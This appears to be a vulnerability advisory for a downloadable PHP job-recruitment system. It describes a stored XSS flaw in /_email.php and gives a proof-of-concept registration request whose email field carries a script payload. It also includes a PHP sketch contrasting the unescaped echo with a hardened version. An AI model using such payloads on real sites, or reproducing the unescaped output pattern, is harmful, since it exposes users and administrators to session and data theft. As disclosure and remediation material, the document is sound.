https://code-projects.org/job-recruitment-in-php-css-javascript-and-mysql-free-download/
/_email.php
In /_email.php there is a cross-site scripting (XSS) vulnerability in the Job-recruitment system. The parameter that can be controlled is $row["email"]. A malicious attacker can obtain sensitive information about administrators.
Code analysis
The email column is selected from the user_account table and concatenated into the $dets parameter, which is then echoed without any filtering.
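An added sketch of the pattern described above next to a hardened form; it is not the project's own code. Only `user_account`, `email`, `$row["email"]` and `$dets` come from this page; the function names, the `<li>` wrapper and the sample rows are assumptions.

```php
<?php
// Constructed stand-in for rows selected from user_account (no database needed).
// The second value is the one registered by the request shown on this page.
$rows = [
    ['email' => 'alice@example.com'],
    ['email' => '<script>alert(1);</script>'],
];

// Vulnerable pattern: the stored value is concatenated into $dets and echoed
// as-is, so a browser parses it as markup instead of text.
function render_vulnerable(array $rows): string
{
    $dets = '';
    foreach ($rows as $row) {
        $dets .= '<li>' . $row['email'] . '</li>'; // <li> wrapper is assumed
    }
    return $dets;
}

// Hardened output: encode for the HTML context at the point of output.
function render_hardened(array $rows): string
{
    $dets = '';
    foreach ($rows as $row) {
        $safe = htmlspecialchars($row['email'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        $dets .= '<li>' . $safe . '</li>';
    }
    return $dets;
}

// Defence in depth at registration: reject values that are not e-mail addresses.
function is_acceptable_email(string $email): bool
{
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

// Run with the PHP CLI to compare the two renderings as plain text.
echo "vulnerable: ", render_vulnerable($rows), PHP_EOL;
echo "hardened:   ", render_hardened($rows), PHP_EOL;
foreach ($rows as $row) {
    $verdict = is_acceptable_email($row['email']) ? 'accept' : 'reject';
    echo "register:   ", $verdict, PHP_EOL;
}
```

Output encoding is the fix for the echo itself; the registration check only narrows what can be stored and does not replace it.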
POST /register.php/ HTTP/1.1
Host: airecruitmentsystem
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
Origin: http://airecruitmentsystem
Connection: close
Referer: http://airecruitmentsystem/register.php/
Cookie: PHPSESSID=k2j8lv5uh7kjvag3t57a63276s
Upgrade-Insecure-Requests: 1
Priority: u=0, i

e=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&p1=admin123
Access the URL
http://airecruitmentsystem/_email.php
Result